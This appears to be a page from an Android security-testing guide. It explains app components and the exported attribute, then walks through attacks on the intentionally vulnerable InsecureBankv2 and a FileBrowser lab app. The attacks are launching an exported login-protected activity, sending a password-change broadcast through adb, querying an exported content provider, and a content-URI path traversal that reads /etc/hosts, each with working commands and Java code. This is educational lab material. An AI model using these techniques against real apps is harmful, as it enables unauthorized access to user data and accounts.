Android Components

Components

  • Activities

    • They dictate the UI and handle the user interaction to the smartphone screen

  • Services

    • They handle background processing associated with an application.

  • Broadcast Receivers

    • They handle communication between Android OS and applications.

  • Content Providers

    • They handle data and database management issues.

Activity

An activity represents a single screen with a user interface. For example, an email application might have one activity that shows a list of new emails, another activity to compose an email, and another activity for reading emails. If an application has more than one activity, then one of them should be marked as the activity that is presented when the application is launched

Services

A service is a component that runs in the background to perform long-running operations. For example, a service might play music in the background while the user is in a different application, or it might fetch data over the network without blocking user interaction with an activity

Broadcast Receivers

Broadcast Receivers simply respond to broadcast messages from other applications or from the system. For example, applications can also initiate broadcasts to let other applications know that some data has been downloaded to the device and is available for them to use, so this is broadcast receiver who will intercept this communication and will initiate appropriate action

An application can be registered to receive broadcasts occurred by system events such as BOOT COMPLETE, SMS RECEIVED, BATTERY LOW, etc. When an application is registered for an SMS RECEIVED event, its receiver will be invoked every time a new SMS is received.

Content Providers

A content provider component supplies data from one application to others on request. Such requests are handled by the methods of the ContentResolver class. The data may be stored in the file system, the database or somewhere else entirely

One of the most important attributes of components is the exported property : android:exported

Whether or not the activity can be launched by components of other applications. “true” if it can be, and “false” if not. If “false”, the activity can be launched only by components of the same application or applications with the same user ID.The default value depends on whether the activity contains intent filters. The absence of any filters means that the activity can be invoked only by specifying its exact class name. This implies that the activity is intended only for application-internal use

Attacking Components

Exported Activity Exploit

  • Decompile the application : apktool d InsecureBank.apk -o insecure/

  • Explore the AndroidMainfest.xml file

  • We can see the activity com.android.insecurebankv2.PostLogin is exposed and the value set to true. This means, any application on the device can invoke this activity

  • Invoke the activity using ADB

adb shell am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin

  • Invoke the activity using another application

package com.package.exploitactivity;

import androidx.appcompat.app.AppCompatActivity;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.view.View;

public class MainActivity<BufferReader> extends AppCompatActivity {

    [@Override](/override)
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

    }
    public void exploit1(View view){
        Intent i = new Intent();
        i.setComponent(new ComponentName("com.android.insecurebankv2","com.android.insecurebankv2.PostLogin"));
        startActivity(i);
    }
}

Broadcast Receivers Exploit

  • Explore the AndroidMainfest.xml file

  • Let's explore the Java code in order to exploit this

  • Exploit using ADB

adb shell am broadcast -a theBroadcast -n com.android.insecurebankv2/com.android.insecurebankv2.MyBroadCastReceiver --es phonenumber 5554 –es newpass Dinesh@123!

Content Providers Exploit

  • Application data is private to an application, hence it is not possible for an application to access another application’s data by default. When applications want to share their data with other applications, Content Provider is a way which acts as an interface for sharing data between applications. Content providers use standard insert(), query(), update(), and delete() methods to access application data. A special form of URI which starts with “content://” is assigned to each content provider. Any app which knows this URI can insert, update, delete, and query data from the database of the provider app.

  • The inbuilt SMS application in Android devices is a classic example of content providers. Any app can query the inbox from the device using its URI content://sms/inbox. But, READ_SMS permission must be declared in the app’s AndroidManifest.xml file in order to access the SMS app’s data.

  • Now, let's explore the AndroidMainfest.xml

  • We can see the provider com.android.insecurebankv2.TrackUserContentProvider is exported

  • Exploring the java code reveal the content URI

  • Attack using ADB

adb shell
content query --uri content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

  • Attack using another application ( Query Data )

    private String fillData() {
        try {
            ContentResolver content = getContentResolver();
            Uri uri = Uri.parse("content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers");
            Cursor cursor = content.query(uri, null, null, null, null);
            while (cursor.moveToNext()) {
                name = cursor.getString(cursor.getColumnIndex("name"));
                return name;
            }
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return null;
    }

    public void passwd(View view) {
        Toast.makeText(getApplicationContext(), name, Toast.LENGTH_LONG).show();

    }

  • Read files

    public void read_file(Uri uri) {
        try {
            InputStream tempfile = getContentResolver().openInputStream(uri);
            byte[] bytes2 = new byte[1024];
            StringBuilder sb2 = new StringBuilder();
            while (true) {
                assert tempfile != null;
                int numRead2 = tempfile.read(bytes2);
                if (numRead2 >= 0) {
                    sb2.append(new String(bytes2, 0, numRead2));
                } else {
                    tempfile.close();
                    file_content_cong = (sb2.toString());
                }
            }
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

Path Traversal

Another type of vulnerability that affects content providers (as well as services) is the directory traversal vulnerability.

If the app allows file reads without specifying permissions, other apps can exploit this vulnerability to read data from the vulnerable app.

Definition of Path Traversal

Directory traversal is a form of HTTP exploit in which a hacker uses the software on a Web server to access data in a directory other than the server's root directory. If the attempt is successful, the hacker can view restricted files or even execute commands on the server.

How Path Traversal impacts the Android O.S

Directory Traversal within Android, allows attackers to perpetrate a path traversal attack in the context of a user application and read files inside/outside internal storage.

Vulnerability Identification (Static Code Analysis)

in the case of the FileBrowser application, file operations are offered through the implementation of a content provider, that, given a URI, allows file access to the application itself (or to other applications). To do this, the content provider needs to implement the openFile method. Methods like query, insert, update, etc. are not suitable for these kinds of operations; obviously, they are best for interacting with databases.

When examining the FileBrowser application’s source code, you will identify that the application uses the openFile method as depicted below (accessfile.java).

Given a URI, the previous method will return a ParcelFileDescriptor file object. The application can then operate on this object to handle the file. It should be noted here that if the content provider is not well-implemented any application can request a file using this method by simply passing a URI.

After further examination you will identify how the application opens a file and reads its content (Content.java).

Vulnerability Exploitation

  • Path Traversal vulnerabilities can be exploited using he ../ characters

  • Parsing URI with path traversal vulnerability

InputStream tempfile = getContentResolver().openInputStream(Uri.parse("content://com.els.filebrowser/../../../../../../../etc/hosts"));

  • Read sample file and print the content

public class MainActivity extends AppCompatActivity {
    public static String file_content;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        read_file();
    }

    public void read_file() {
        try {
            InputStream tempfile = getContentResolver().openInputStream(Uri.parse("content://com.els.filebrowser/../../../../../../../etc/hosts"));
            byte[] bytes2 = new byte[1024];
            StringBuilder sb2 = new StringBuilder();
            while (true) {
                assert tempfile != null;
                int numRead2 = tempfile.read(bytes2);
                if (numRead2 >= 0) {
                    sb2.append(new String(bytes2, 0, numRead2));
                } else {
                    tempfile.close();
                    file_content = (sb2.toString());
                }
            }
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    public void getFile(View view) {
        Toast.makeText(getApplicationContext(), file_content, Toast.LENGTH_LONG).show();
    }
}
PreviousClient-Side VulnerabilitiesNextAndroid Debugging

Last updated